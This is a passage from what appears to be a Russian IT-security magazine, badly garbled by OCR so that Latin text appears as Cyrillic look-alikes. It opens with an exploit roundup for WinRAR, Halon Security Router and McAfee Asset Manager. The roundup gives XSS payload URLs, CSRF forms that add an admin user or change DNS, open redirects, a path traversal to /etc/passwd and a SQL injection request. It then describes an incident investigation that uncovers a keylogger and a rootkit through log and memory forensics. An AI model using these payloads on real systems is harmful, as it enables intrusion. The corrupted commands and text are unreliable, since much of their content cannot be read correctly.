\ЛЛпВАВ архив, полвзователв увидит изображение. Если полвзователв вначале рас- 
пакует фаилы, то все равно увидит изображение, но в обоих случа^х запустит в итоге 
ЕХЕ-фаил. 

Также дгт әтои у^звимости был написан Ме_а5р1о.1:-модулһ, которыи ты можешв 
вызватв через команду 
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Открытие «изображенил» в программе МпРАР 

ТАНСЕТЗ 

\Л/ЈпВАВ3.80; 
\Л/ЈпВАВ4.20. 

501ЛЈТ10Ы 

Еств исправление от производител^. 



МНОГОЧИСЛЕННЫЕ УЛЗВИМОСТИ В НАКМ 8ЕС1ЈР1ТҮ Р01ЈТЕР (ЗР) 
3.2-ШТЕР-Р1 



СҮ55ү2: 


5.5 (АУ:Ы/АС:1_/Аи:5/С:Р/1:Р/А:1\1) 


6.5 (АУ:Ы/АС:1_/Аи:5/С:Р/1:Р/А:Р) 


6.5 (АУ:Ы/АС±/Аи:5/С:Р/1:Р/А:Р) 


Дата релиза: 


7 апрел^ 2014 года 


Автор: 


Јиап Мапие! ӨагсЈа 


СУЕ: 


Ы/А 



Разбавим наш обзор уже стабилвными у^звимост^ми в роутерах. Сегодн^ рассмо- 
трим серикз ошибок в 5есип.у Воит.ег от компании На1оп, наиденных компаниеи 
Птогсе. 

ЕХР1.01Т 

1 . Отраженные ХЗЗ. Параметр 1од: 



Јт^т:р: //бг. с!ето. һа1оп. 5е/соттапс15/1о_Ү1еыег/?1о_=Ү1с0Д^ 
Ј</5сг1рт:><5сг1р1:>а1ег1:(1)</5сг1р1:>^ 



Параметр т11е: 



һт:т:р : //5Г . с!ето . һа1оп . 5е/т11еҮ1еыег/ ?тПе=" ; </$сг1р-\:><-± 
<5сг1рт:>а1егт:(1)</5сг1рт:>^ 



Параметр §гарһ: 

Һ1:1:р: / /5г.с1ето. һа!оп. 5е/5у51:ет/%гарһ5/?§гарһ= '+а!ег1:(1) + ' 
Параметр соттапс!: 

Һ1:1:р: / /5Г .(Јето. һа!оп. 5е/соттапс15/?соттапс1= '+а!ег1:(1) + ' 
Параметр 16: 

Һ1:1:р: / /5Г .(Јето. һа!оп. 5е/5у51:ет/и5ег5/?Јс1= '+а!ег1:(1)+' 
Параметр ип: 

Һ1:1:р: / /5г.с1ето. һа!оп. 5е/сопҒЈ§/?игЈ= '+а!ег1:(1) + ' 
Другие параметры, возможно, также у^звимы. 
2. С5ВҒ 

Перва^ функии^ позвол^ет добавитв полвзовател^ /5у5т_еш/и5ег5/?ас1с1=и5ег. При- 
мер атаки: 

<1тст1> 
<һос1у> 

<-Ғогт те"сһос1="Р05Т" пате="-Ғогт0" әссЈ.оп=<-' 
"ЈтЕЈр: //1оса1һо5 "Е: 8Ө/5у5"пет/и5ег5/?ас1с1=и5ег"> 
<Јпри1: 1:уре= "ҺЈс1с 1еп" пате="сһеск ои1:" уа!ие ="17"/> 
<Јпри1: ■Суре="һ1с1с1еп" пате="арр! у " уа!ие=""/> 
<Јпри1: ■Суре="һ1с1с1еп" пате="1сј" уа1ие=""/> 
^<1при"С ■суре="һ__с1с1еп" пате="о1с!_и5 ег" уа!ие=""/> 

<1при"С ■суре="һ_.с1с1еп" пате= "и5ег" уа!ие ="һаскег "/> 
^<1при"С ■суре="һ_.с1с1еп" пате="-Ғи !1-пате" у а!ие ="1ТҒ0КСЕ Н4хӨг"/> 
<Јпри1: 1:уре="һ1с1с1еп" паше="с1а55'1 үа1ие=""/>^ 
<Јпри1: ■Суре="һ1с1с1еп" пате="ра55ы огс!" уа!ие ="1234"/> 
<Јпри1: 1:у ре="ҺЈс1с1еп" пате="ра55ы огс!2" у а!ие= "1234"/> 
</-Ғогт> 
</һос!у> 
</һ*т1> 

Друга^ же измен^ет □ЫЗ-конфигураи.ик) /пе"смогк/с1п5: 

<1тст1> 
<һосЈу> 

<-Ғогт те1:һос1="Р05Т" пате="-Ғог т0" ас1:Јоп=<- 
"Һ1:1:р: //1оса1һо51::8Ө/пе1:ыогк/с1п5/"> 
<Јпри1: ±уре= "ҺЈс1с 1еп" пате="сһеск ои1:" уа!ие ="17"/> 



<Јпри1: 1:уре="ҺЈс1с1еп" пате="арр1у" уа1ие=""/> 

<Јпри1: 1:уре="һ1с1с1еп" пате= "пате-5егуег5" у а!ие= "8.8.8.8"/> 

<Јпри1: 1:у ре="ҺЈс1с1еп" пате="5еагсһ-с1ота1п"^ уа1ие='^"/>^ 

<Јпри1: т.у ре="һ1с1с1еп" пате="һо5 1:- пате" у а 1 и е ="5Г .(Јето. һа!оп . 5е' 1 / > 
</-Ғогт> 



</оос1у> 
</һт_т1> 

У^звимы также следукзидие функиии в модуле пет_1\/огк: 

Ые-\л/огк СопТЈдига.Јоп: һир://ххх.ххх.ххх.ххх/пе.\л/огк/оа5Јс 

1_оас! Ва1апсег Соплдига.Јоп: һир://ххх.ххх.ххх.ххх/пегл/УОгк/1оас1оа1апсег 

• УРЫ Соплдига.јоп: һ..р://ххх.ххх.ххх.ххх/пе.\л/огк/урп 
ҒЈге\л/а11 Соплдига.Јоп: һ..р://ххх.ххх.ххх.ххх/пе.\/\/огк/лге\л/а11 

3. Отҝрытыи редирект. Улзвим параметр ип в следукзидих запросах: 

• һир://5г.с!ето.һа1оп.5е/с1и5Тег/?5\л/ЈТсһ То=&игЈ=һир://Ј^огсеЛк 

• һир://5г.с1ето.һа1оп.5е/сопТЈд/?сһескоиТ=17&игЈ=һир://Ј^огсеЛк 

ТАНСЕТЗ 

На1оп 5есип.у Вои.ег (5В) 3.2-\ллп.ег-г1 . 
801АЈТ10Ы 

Установитв или обновитв до (5В) у3.2г2. 



РАЗЛИЧНЫЕ УЛЗВИМОСТИ В МСАҒЕЕ АЗЗЕТ МАМСЕР 6.6 



СУ55у2: 


4.0 (АУ:В/АС:1_/Аи:5/С:Р/1:Ы/А:1\1) 


Дата релиза: 


18 марта 2014 года 


Автор: 


Вгапс!оп Реггу 


СУЕ: 


2014-2586 



Исследователв Брәндон Перри (Вгапс!оп Реггу) нашел серикзу^звимостеи в продукте 
от крупнои ИБ-компании МсАТее Аз5е. Мападег. Он исполызуетс^ во многих компа- 
ни^х дгт мониторинга сети в реалвном времени с и,елыо обеспечени^ безопасности. 

Первои по^виласв Х55-у^звимоств, о которои автор написал в своем твиттере 
с пометкои 0с!ау. Позже по^вилосв писвмо в рассылке 5есИ5.5 с дополнителвными 
и более интересными ошибками, которые мы и рассмотрим далвше. 



ЕХР1.01Т 

Перва^ у^звимоств позвол^ет исполызоватв неавторизованнукз Х55. Например, 
попытаемс^ залогинитвс^ с такими данными: <о>-гсЈ5а</о> : ра55могс1. После зтого, 
как ты видишв на скриншоте, полызователв с достаточными правами увидит в логах 
попытку авторизоватвс^ с выделенным именем. 

Следукзшаи у^звимоств позвол^ет скачиватв произволвные фаилы с такими же 

ппаиами лппт\/пд чтп мгппт-.г-л/рт рр6-прпкрп л па выггп/гчкч/! птчртпк Л па грнрпд! \ \л\л пт^ 



четаполвзователвделаетзапросна5егу1е"1:/с1о\л/п1оас1Керог1:?герог"1:Ғ11еМате=Ыаһ. 
Вследствие зтого атакукзидии может провести атаку сИгес-согу £гауег5а1 и скачатв 
фаил /е"сс/ра55^с1. 
Пример запроса: 

СЕТ_/5егү1е1:/с1оып1оас1Керог1:?герог1:Ғ11еМате= . ./../. . /../../../../.. /е1:с/<-' 
ра5 5ЫсЈ&-Ғогта1:=С5У НТТР /1.1 



Ке-Ғег ег: 1тс1:р5 : //172. 31. 16. 167/1пуеп1:огу?^11:егСо1итп5=&сигУЈеы1с1= -!&<-■ 
та1ггСа1приегу= - Сгие&-Ғогта"С=5еагсһ&со11ес - Сог1с1=пи11&сг1 - С1са11"Су=0&ра§еМит=1&4-' 
1оса1:Јоп =1пуеп1:ог у&уЈеы5е1ес1:=-999999&^11:егУа1иеҒЈе1с1=&огс1егВу=Ғ1КЕ1л1А11ЕР&^ 
огсЈегВу^^^^ТЕ&огсЈегВуЗ^СК^Т^САИТҮ^МАМЕ&ы^г^^ӨӨ&ы^гС^г^^^ӨӨ&ас ^Јоп^ 
А11Р 1Т КЕР1 5С0УЕК&-Ғогта1:5е1ес*:= 



И последнт^ на сегоднт у^звимоств — 501_-инБекиЈ/т. 

Непривилегированныи, но авторизованныи полвзователв может инии,ии- 
роватв атаку с исполвзованием 501_-инБек1дии, создав отчет по аудиту и кон- 
тролиру^ им^ полвзовател^ в әтом отчете. У^звимым ^вл^етс^ параметр 
и5ег, а сам запрос выпгтдит примерно следу-ошим образом: 

Р05Т /Ј5р /г ерог1:5 /Керог1:5Аис1Ј1:. ј5р НТТР/1.1 
Н051:: 



-ҒготОа1:е=ӨЗ-19-2Ө14&1:оОа1:е=03-19-2014&-Ғгее1:ех1:=&5еүег11:у=0&Аис111:Туре=12&4- Ј 
и5ег=Ас!тЈпЈ5"Сга"Сог 
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Пример вставки произволвного НТМ1_-кода при неправилвнои 
аутентифика1дии в МсАЈее А55е1: Мападег 



ТАНСЕТЗ 

МсАТее Аззе! Мападег у6.6. 
501ЛЈТ10Ы 

Еств исправление от производител^. 



Взлом 



ЛОГОВ ПОБОЛҺШЕ, 

ПАМ^ТИ НЕЖАЛЕТЫ 




РАССЛЕДОВАНИЕ ИНиИДЕНТА ИБ 
ПО ГОР^ЧИМ СЛЕДАМ 
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БЗКГРАУНД 

В России сложиласв интересна^ ситуаии^ с расследованием иниидентов в сфере 
информаиионнои безопасности. Болыјјинство ини,идентов замалчиваетс^ — если, 
конечно, дело не касаетс^ банковских счетов и финансовых транзакиии. Админи- 
страторы и служба ИБ (если она еств) пытакзтс^ предприн^тв какие-то меры, затем 
все отчитывакзтс^ перед руководством и об ини,иденте забывакзт. О полноиенном 
расследовании речи, как правило, не идет, потому что либо безопасностыо зани- 
матвс^ в компании просто некому, либо еств отдел, которыи разработал политику 
безопасности, внедрил современные технические средства, но әтим и ограничива- 
етс^. Ликвидаии^ последствии сводитс^ к смене чувствителвнои информаиии, та- 
кои как пароли и клкзчи, переустановке пары-троики операиионных систем (не всег- 
да тех, которые необходимо). 

Если следоватв букве закона, когда обнаруживаетс^ ини,идент информаиионнои 
безопасности, нужно обраш,атвс^ в государственные органы правопор^дка. Но ком- 
мерческие структуры редко на зто идут: мало того что приходитс^ открыто признатв- 
с^ в собственном кос^ке, так еиде и возникает множество вопросов — лии,ензионныи 
ли софт, обеспечивакзтс^ ли меры, требуемые регул^торами... Потому у плохих ре- 
б^т складываетс^ ложное оидуидение абсолкзтнои безопасности, особенно если әти 
реб^та занимакзтс^ взломом ради моралвного удовлетворени^, а не ради коммерче- 
скои выгоды. 06 одном таком случае п и расскажу в әтои статве. 

ттх 

Компани^ N достаточно прогрессивна в своеи сфере, поәтому внутреннее обеспе- 
чение службы ИТ на высоте: хорошие средства коммуникаиии, современное обору- 
дование, приличные зарплаты. В свое врем^ была создана служба безопасности, ку- 
рирукзидаи вопросы информаиионнои, әкономическои и физическои безопасности. 
Приглашенныи подр^дчик помог построитв заидииденнук) ИТ-инфраструктуру и вве- 
сти режим коммерческои таины. 

1Т-инфраструктура представл^ет собои следукзшее: 
• серверы располагакзтс^ в демилитаризованнои зоне, доступ по сети в ДМЗ ограни- 

чиваетс^ межсетевыми әкранами; 

повсеместно введена виртуализаии^ серверов; 

присутствует сегментаии^ сети с ограничением доступа между сегментами. Рабо- 
чие станиии разнесены по \/1_А1\Гам, с филвтраииеи трафика между ними, в соответ- 
ствии с внутреннеи иерархиеи; 

права доступа полвзовател^м выдел^кзтс^ по приниипу минималыных привилегии; 

иентрализовано софт обновл^етс^ толвко дгт продуктов МјсгозоТ!:; 

ведетс^ иентрализованныи мониторинг серверов, правда, в основном с позииии 

доступности. 

ИНЧИДЕНТ 

В начале года кост^к топ-менеджмента компании N отправилс^ на корпоративныи 
выезд в далекие страны. Поездка предполагала не толвко развлечени^, но и рабочие 
моменты, однако им не суждено было состо^твс^: материал, которыи планировали 
презентоватв и обсудитв по-современному — с мобилвного планшета, был утер^н. 
Прекрасное солнечное утро омрачилосв: смартфоны и планшеты всех собрав- 



шихс^ в отеле на берегу океана (и не толвко их) оказалисв девственно чисты. 

Данна^ информапут была доведена до службы безопасности, котора^ разум- 
но предположила, что тут не обошлосв без внешнего вмешателызтва. Очевидно, 
что у всех сразу аккаунты ЈС1оис! взломатв не могли, и служба безопасности запо- 
дозрила, что угроза исходит из корпоративнои сети. Удаленно очиститв мобилвные 
устроиства можно толвко через соответствукзшии сервис, например через корпо- 
ративныи сервер М.сгозоТ. Ехсһапде. Команда, позвол^кзша^ очиститв устроиство 
полвзовател^ с адресом ас1т.п@1оса1.һо51:, выггтдит следукзидим образом: 



С1еаг-МоЫ1еРеуЈс е -ТсЈегуЕг Еу ММ_Топу5т1т_һ -Мо^1т1са1:10пЕта11Ас1с1ге55е5 
м ас1т1п@1оса1 . һо5"_" 



ИТ-службе поставили задачу проверитвжурналы сервера 0\/\/А: не было ли подозри- 
телвнои активности в отношении аккаунтов пострадавших и компрометап,ии паро- 
л^ администратора сервера М5 Ехсһапде. Администраторы обнаружили зап,епку — 
доступ к аккаунтам пострадавших в предшествукзидие ини,иденту дни неоднократно 
осушествл^лс^ с несколвких нетипичных дл^ них 1Р-адресов. Как п позже ввтснил, 
засвеченные 1Р-адреса были выходными Тог-нодами. 
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Удаленныи ваип через веб-интерфеис администратора 0У\/А 



АНАЛИЗ ЛОГОВ ОШ 

Логи 0\Л/Ахран^тс^ поумолчаникз в%5у5т_етКоот_%\5у5т_ет32\1о§1п1е5\1в5Ус1. Струк- 
тура логов — обычные текстовые фаилы, изучатв которые без вспомогателвного ин- 
струмента, особенно при болвшом количестве полызователеи, утомителвно. На по- 
мош^ придет 1_од Рагзег — оченв .денныи инструмент, которыи пригодитс^ не толвко 
в подобнои ситуаи,ии. Дл^ удобства преобразуем все логи в один фаил формата С5У: 

с:\Рго§гаш ҒПе5\1_о§ Раг^ег 2,2>1_о§Раг5ег.ехе ^±јј.15мЗс "5е1ес 1: * Јпт_о с.:\<-- 
т_етр\а111о§. 1о§ -Ғгот %5у5"_етКоо-_%\5у5"_ет32\1о§т11е5\ш35Ус1\* " -о: С5У 



т 

Ы 

Г 



з-изегпате , аа£е , 1; хпе , с-хр, сз-иг _.-з1;ет, сс-игх-сшегу , сз < 1Ј зег-Адеп 1; У 



/Пхсгоео1гг— Ј. егиег- Нсг хиеһ. упс^ае 
Ғаи1£ . еан, 1Ј зег = 1&Веихсе1 Д=Дрр1 '&Өеи хсеТуре =хРаа^Ста^8упс&1_о_г=и 

121_^аарСШ_Ј Ј аарИО_ПрсС11_ПрсЫ5_Ег51_Рк4031864177_Еггог : Пето1;е1ЈхреҒ.ечиез1;еа_, Нрр 
1е-хРаа2С2/1002.146 

______■ \ и^ -- ^" - " ғ ~ — — — — : — — — —— — - — ■ — ~^~, /оиа/ЛеҒаиИ; . азрх, ае =1 £егп&:£ =1 РМ 

.Но1;е .Ехсһапде .Ас1;хие8упс .Пето1;е1ЈхреСопҒхгта1; хоп&ха=РдННННС5тН25М08 хЗг5һрыЕг9 х01 
ВыВтВк2 иН 1; п г8 Кһт7 V 9 Һ4МСЗ Н Вп 4к 1СЕН Н СКЗ 2 Ср Јһыб 8 2 1һс 01Ј9 1 рһ1 Н БСк 2 Ғ V 8 22 Н Н Н Ј&ргҒ 11; псу = 
32&ргҒгрссп1;=14&ргҒгрс11;псу=31&ргҒ 1Дрсп1; =2&ргҒ 1Јр11;псу=0&ргҒаи1сп1;=08(ргҒаи111;псу 
=0, "Могх11а/5 .0+<ихпаоы5+ЫТ+6 .1 ; Н№иб4>+Арр1еиеһКх1;/537.36+<КНТМ1_, +1хке+Сеско>+С 
һготе/33 . 0 . 1750 . 146 +8аҒаг х/537 . 36 " 



Логи 0Ш 

После чего составим список событии, отражакзидих доступ полвзователеи к 0\/\/А: 

с:\Рго§гаш Ғд.1е5\1_о§ Рагзег 2.2>_.о§Раг5ег.ехе -Ј:с5У "5 е1ес± с5-и5егпаше, <-■ 
(-а^еДз-те, с-1р, с^- игЈ-^ ЈгешЈ с5(115ег-А§еггсХЈ~К0М 6 : \"_етр\а111о§.*-^ 
1о§ 1:о с!:\ 1:етр\ассе5 5.С5У" -о:с5У 

Ввтсн^ем, кто обраидалс^ к функии^м (М1А, отвечакзидим за удаление данных 
с устроиства: 

с:\Рго§гат Ғз.1е5\1_о§ Раг^ег 2.2>_.о§Раг5ег.ехе -Ј:с5У " 5е1ес± с^-и^егпате, <-■ 
сЈа^е , •£Јте Ј с-јр, с^-игЈ -^^егпЈ с5-иг1^иегу., С5(115ег-А§еп1 :) ҒКОМ <-■ 
6 :\1:етр\а111о§. 1о§ £о сЈ : \1: етр\ассе55 2. С5У ЫНЕКЕ с5-игј -диег у ИКЕ <-■ 
' %ы1ре% ' " -о:с5У 

Суд^ по системным логам, аккаунт администратора сервера 0\Л/А скомпрометиро- 
ван не был. 1Делыи денв админы читали логи серверов, а служба безопасности тем 
временем беседовала со всеми админами по очереди, предполага^, что диверсант 
внутри компании. Однако зто ни к чему не привело. Тогда они обратилисв по старому 
знакомству ко мне. 

Поставили они такие задачи: 

• установитв источник угрозы — внутреннии или внешнии; 
ввтснитв С1денарии атаки; 

• определитв последстви^ — скомпрометированные аккаунты и системы; 

• определитв далвнеишие деистви^ дгт ликвидаиии угрозы. 

Оказавшисв на месте, п опросил ИТ-персонал. По итогам составил схемусети, опре- 
делил расположение серверов и сервисов, собрал информаиикз об исполвзуемых 
операи,ионных системах, настроике межсетевых әкранов, паролвнои политике, по- 
литике обновлени^ софта, персоналвныхзонах ответственности администраторов. 

Перепроверил резулвтаты анализа логов администраторами. С помоидыо пттз\/уа1к 
проанализировал МҒТ на наличие удаленных в последнее врем^ фаилов. Сервер 
0\Л/А был чист и нетронут. 

Таккакскомпрометированыбыли пароли несколвкихсотрудниковсразу, п решил, 
что начатв надо с того места, где хран^тс^ пароли. Лкзбои хакер, попада^ в корпора- 
тивнукз сетв, сперва спешит полакомитвс^ хешиками. Вопрос әтот избитыи, и дета- 
ли получени^ хешеи, думакз, знакзт все. Такои сиенарии надо отработатв первым — 
как наиболее веро^тныи. В данном случае доменна^ авторизаии^ была настроена 
почти на всех устроиствах, за исклкзчением сетевого оборудовани^ и Ыпих-серве- 



ров. Исход^ из зтого, 9\ решил обследоватв контроллеры домена. 

Первым делом настроил отделвныи сервер, на которыи стали зеркалироватвтра- 
фик с потен1диалвно скомпрометированных узлов и трафик, ииркулирукзидии через 
шлкззы, в интернет. Подобные данные могут пригодитыз^ в далвнеишем д/т ввтвле- 
ни^ несанк1дионированного доступа. 

^ получил актуалвные копии виртуалвных машин и начал с ними разбиратвс^. 
Подклкзчив виртуалвные жесткие диски к своеи системе, запустил проиесс восста- 
новлени^ данных — еств веро^тноств обнаружитв удаленные логи фаилов, которые 
исполвзовал злоумышленник. Дл^ әтого можно вз^тв лкзбои удобныи софт д/т вос- 
становлени^ данных, резулвтат будет примерно одинаков. ^ предпочитакз П-ЗШсИо. 

Так как у мен^ в исследовании были толвко образы виртуалвных машин, прои,е- 
дура несколвко упрошапасв — не нужно тратитв врем^ на сн^тие образов жестко- 
го диска и оперативнои пам^ти. Фаилы жестких дисков виртуалвных машин можно 
либо конвертироватв в гам, либо монтироватв как еств, с помоидыо соответствукзших 
утилит. Образ КАМ и фаил сохраненного состо^ни^ можно сконвертироватв в «сырои» 
образ. Не стоитзабыватв и про фаилы подкачки — в нихтоже порои находитс^ много 
интересного. >/о1аШ1у версии 2.3 умеет все әто разбиратв и конвертироватв в случае 
необходимости. 
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Интерфеис Р-5^ис1Јо 



Отличи^ работы с физическои системои от виртуалвнои в том, что образ пам^ти 
заполучитв сложнее — әто св^зано с риском повредитв текушее состо^ние и поте- 
р^твданные, которые могутоказатвс^ сушественными. Также при исследовании фи- 
зическои системы необходимо примен^тв дополнителвные инструменты и методики 
дгт определени^ скрытых областеи (например, Ноз! Рго1ес1ес1 Агеа — НРА и Оеујсе 
Соплдига^Јоп Оуег1ау — ОСО). 

Обследоватв\/\/Јпс1о\л/5-машины в моем случае^ решил последукзшемус1денарикз: 
1. Определитв, какие фаилы и их атрибуты подвергалисв модификаи,ии (создава- 

лисв. откоывалисв. оедактиоовалисв. үдал^лисв). Дл^ әтого п исполһзүкз инстоү- 



мент пгт5\л/а1к или 1одрагзег. Например, командои: 

с:\Рго§гаш ҒПез (х86)\1_о§ Рагзег 2.2\1.о _Раг5ег.ехе" -Ј:Ғ5 -о:С5У <-■ 
-рге5еп/е1_а51:АссТ:1те:0М "5е1ес1: НА5НМ05_Ғ11_Е(Ра1:һ) , Сгеа1::_опТ:_те Ј Ј--'^ 
1_а5"_1л1г:_ТеТ:_теЈ 1_а5"г_Ассе55Т_.те., Мате^ Ра"_һ.,5:_2е јгтс о 'Р:\ҒЈ1е ТгееҒР. С5У' <- 
Ғгот 'Ү: \*.*' 

Так мы получаем переченв всех фаилов на анализируемом диске, со всеми не- 
обходимыми дгт анализа атрибутами. Делатв зто, конечно, лучше после восста- 
новлени^ данных, зкспортиру^ все данные вместе с атрибутами на другои диск, 
дл^ полноты картины. 

Как говоритс^ — все ествфаил. Если злоумышленникчто-либо делал, об зтом 
всегда остаетс^ информаии^, хот^ бы удаленные фаилы — пуств даже их содер- 
жимое уже недоступно, зто может помочв выстроитв понимание того, что прои- 
зошло. 
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Изучение атрибутов фаилов 

2. Необходимо определитв, подклкзчалисв ли внешние носители. В реестре всегда 
остаетс^ записв о подклкзчении нового устроиства. В логах 5у5т_ет . еут_х по умол- 
чаник) сохран^етс^ записв с \0 20001. Длл работы с логами еств соответствук> 
шие утилиты, например 1л/±пс1о\л/5 115В 5т_ога§е Рагзег. Әтот кеис рассматрива- 
етс^ на случаи, если мы имеем дело с внутренним нарушителем, которыи просто 
закинул необходимыи инструментарии с флешки, скопировал что нужно и унес 
домои дгт далвнеишеи работы. 

3. Необходимо проследитв, вотношении какихучетныхзаписеи домена происходи- 
ли следукзшие событи^: вход, выход, изменение парол^, групп и других своиств. 
Записи об әтих изменени^ххран^тс^ в реестре и базах N105. сЈ_.т_ или 5АМ. В логах 
остакггс^ событи^ с \0: 46274, 46265, 4634, 4624, 4778 (при подклкзчении по ВОР). 

4. Необходимо определитв, какие программы или команды исполн^лисв. Записи 
остакзтс^ в логах, в папке РгеТе.сһ, в реестре (г\1Т115ЕҒШАТ). 

5. Необходимо определитв, какие сетевые подклкзчени^ были. Данные об әтом 
обычно можно сн^тв либо сживои системы, либо из образа пам^ти, сн^того сжи- 
вои системы. Плагины Ые.зсап или ипихпе.з.а. в \/о1аШ.у. В работе над слепком 
оперативнои пам^ти как и многие, исполвзук) \/о1атШ1:у и в некоторых случа^х 
ВесШпе. ВесШпе интересна тем, что позвол^ет полностыо провести анализ, а за- 
тем нагл^дно визуализирует резулвтат. При әтом ВесШпе позвол^ет загружатв 
хеши известных фаилов (которые можно также составл^тв самосто^телвно), 
что упрошает задачу по анализу — утилита подскажет, что фаил доверенныи. 

Помимо әтого, можно извлечв содержимое проиесса в фаил дгш далвнеишего ис- 
следовани^. 
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Интерфеис РесШпе 



СЛЕД НАИДЕН 

В оперативнои пам^ти одного из контроллеров домена обнаружилисв ^вные при- 
знаки компромета-дии: 

про-десс 5Усһо5т_.ехе запуиден из С : ХЫхпсЈоызХЫОЫбД, а не из 5у5т_ет32, как ему 

полагаетс^; 

исход^идие сетевые соединени^, на 1Р-адрес частного хостинга в Штатах; 
неизвестныи про-десс запуиден с РР10, не отображакзидимс^ в списке про-дессов. 
Про-десс был идентифи-дирован с помоидыо утилиты уо1 . ехе. 

уо1 . ехе р51Ј5т. -т" Ј та§е . утет ^дгот11е=1л11п2008К25Р1хб4 >р 51Ј5"һ 

0-Ғ-Ғ5е1:( У) Иате Р1Р РР1Р 
0хт:-Ғт"-Ғ-Ға8Ө199бсһЗӨ 5р јпт_1х64.е хе 282Ө 1388 

Но Р10 1388 болвше нигде не значилс^, что всегда оченв подозрителвно. В первукз 
очередв необходимо было извлечвтело зтого про-десса и проверитвхот^ бы антиви- 
русом. 

уо1.ехе с1итрт11е5 -г 5р1|тс1х64 --Ғ 1та§е.үтет р51Ј 51:--р гот11е=ЫЈп2ӨӨ8К25Р1х64 -Р . / 

При проверке на УЈгизТо1:а1 показателв вы^влени^ был 34/50. При поверхностном ана- 
лизе обнаружилосв, что дата компил^иии и сборки бинарника 1992-06-19 22 : 22 : 17, 
а наиденныи при офлаин-анализе образа диска фаил имел типичные дгт малвари 
изменени^ в атрибутах. Дата создани^, изменени^, последнего обраидени^ были 
одинаковы и гораздо старше осталвных системных фаилов. Фаил имел неболвшои 
вес, создавал логи в зашифрованном виде и отправл^л их по сети посредством 
НТТР5. С виду — типичныи кеилоггер. Интересно, теперв предстоит разобратвс^, 
откуда и когда он попал в систему. 

После восстановлени^ данных все лог-фаилы были загружены в Еуеп! 1.од Ехр1огег 
дгт далвнеишего анализа. Штатные средства в такои ситуа-дии не подход^т: они 
не так поворотливы при поиске, а размеры логов оченв болвшие (>30 Гб). 
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Изучение событии с помош,ыо Еүеп! 1_од Ехр1огег 



Отсортировав событи^ по сетевому адресу источника, ^ получил несколвко записеи 
логов, показывакзидих, что осуидествл^лс^ сетевои вход (тип 3) одного из админи- 
страторов с сервера 2аоЫх. По событикз входа была определена дата установки кеи- 
логгера. Ее подтвердило врем^ по^влени^ первых фаилов, создаваемых кеилогге- 
ром, — они удал^лисв, но их получилосв восстановитв вместе с атрибутами. Болвше 
ничего подозрителвного ни в логах, ни в пам^ти, ни в реестре обнаружено не было. 
Дополнителвно ^ проанализировал домашние каталоги полвзователеи сервера, 
но зто не принесло новых резулвтатов. 

Завершив работу с контроллером домена, ^ переклкзчил внимание на сервер 
2аоЫх — именно с него осуидествл^лс^ доступ к контроллеру домена по сети. 

Обследование Ыпих-системы кон1дептуалвно не отличаетс^ от обследовани^ 
\Л/Јпс!о\л/5-системы. Ишем все то же самое: историкз деиствии, производимых с си- 
стемои. Если копнутв глубже, то исследоватв можно все, от аппаратного уровн^ 
до истории запуска МјсгозоТС РаЈп1: или набранных текстов. Но к счастыо, обычно та- 
кои задачи не стоит. Зачастукз задача достаточно конкретна и нет необходимости 
тратитв врем^ на то, что не принесет резулвтата. 

В данном случае предсто^ло обследоватв Ыпих-систему на предмет несанки,ио- 
нированного доступа. О сервере предварителвно было известно следукзидее: уста- 
новлен Зизе Ыпих, Арасһе + РНР + Му301_ + 2аһЫх с сопутствукзидим программным 
обеспечением — всем знакомым 1_АМР. Вы^снилосв, что сотрудник, ответственныи 
за сервер, с ОС Ыпих обидаетс^ на «вы». Установил и обслуживал сервер его предше- 
ственник, которыи давно ушел из компании. 

Дл^ виртуалвного образа диска сервера был запуиден поиск удаленных фаилов. 
Стоитзаметитв, что, когда имеешв дело с образами, всегда лучше работатвс копиеи, 
а полученныи оригинал хранитв отделвно. Естественно, желателвно протестироватв 
работоспособноств лкзбого программного обеспечени^ до того, как приступатв к ис- 
следованикз. Приходилосв сталкиватвс^ стем, что образы пам^ти, созданные разны- 
ми способами, выдавали при исследовании разныи резулвтат. Хот^ не стоит исклкз- 



чатв вариант, что в систему исследователи закралс^ вирус, — может оытв и такое. 

Изучатв образ содержимого оперативнои пам^ти системы Ыпих можно тем же 
комплектом \/о1аШ1у, желателвно последнего стабилвного релиза, хот^ после вер- 
сии 2.0 он вполне справл^етс^. Суидествует некотора^ разнии,а в сравнении с анали- 
зом образов ВАМ семеиства \Л/Јпс1о\л/5 — в Уо1а{Шт.у нет и в прини,ипе не может бытв 
шаблонов структуры пам^ти дгт каждого ^дра. Позтому шаблон придетс^ создатв. 
Дл^ зтого необходимо: 

• запуститв копикз исследуемои системы; 

• скопироватв туда директорикз ^о1а"с11гсу/-соо15/Нгшх; 

• собратв проект, получив в резулвтате фаил шосШе.сЫаг-Ғ, и скопироватв его вме- 
сте с актуалвным /ооо"с/5у5"сет.тар того ^дра, на котором работала система 
при сн^тии образа ВАМ, обратно на систему исследовател^; 

• упаковатв оба фаила, например в 1Лпих.21р, и поместитв архив в уо1а"сШ"су/ 
р1и§1П5/оуег1ау5/Ипих/. 

Теперв при запуске \/о1аШ1у с клкзчом - - 1п-Ғо созданныи тобои профаил будет виден 
в списке и с ним уже можно начатв работу над образом. Без әтого ничего не полу- 
читс^, потому что Уо1а1Штү необходимо знатв структуры данных ^дра (тосШе. с1и/а г-Ғ) 
и иметв имена переменных, функи,ии и их адреса в пам^ти (5у5"сеш . тар). 

Вернемс^ к исследованикз. У мен^ было подозрение, что система, на которои 
установлен 2аоЫх, был скомпрометирована. Осталосв пон^тв, как и кто әто сделал. 
Лишних клкзчеи дгт 55Н, посторонних учетных записеи в системе не обнаружилосв. 
^ предположил, что в системе еств оасксЈоог, а возможно, и руткит. Дгт установки 
подобного рода софта зачастукз требукзтс^ максималвные привилегии. Әто очевид- 
но, достаточно вспомнитв основные прини,ипы работы более-менее передовых рут- 
китов в Ыпих-системах: 

• загрузка модугт ^дра; 

• скрытие прои,ессов, входов полвзователеи, мо- 
дулеи ^дра, фаилов, сетевых соединении; 
подмена системных фаилов. 

В первукз очередв необходимо было проверитв са- 
мые простые веши, а именно историкз выполнен- 
ных команд: 

уо! --Ғ Јша§е. ушеш -рго^Ј1е=1ЈпихЈх86 НпихЈзазһ 

Истори^ команд была совсем неболвшои, и первое, что бросилосв в глаза, — әто 
1П5тосЈ гс. ко. Кстати, вфаиле истории надиске, конечно, ничего подобного небыло, 
более того, восстановитв какие-либо данные из фаила истории также не уда- 
лосв — содержимое уже было перезаписано быстро генерирукзидимис^ логами. Так 
что без образа пам^ти зти данные были бы неизвестны. Далее предсто^ло наити 
упом^нутыи в истории команд модулв ^дра. Модулв был обнаружен на диске в ди- 
ректории РНР-скриптов интерфеиса 2аоЫх. 

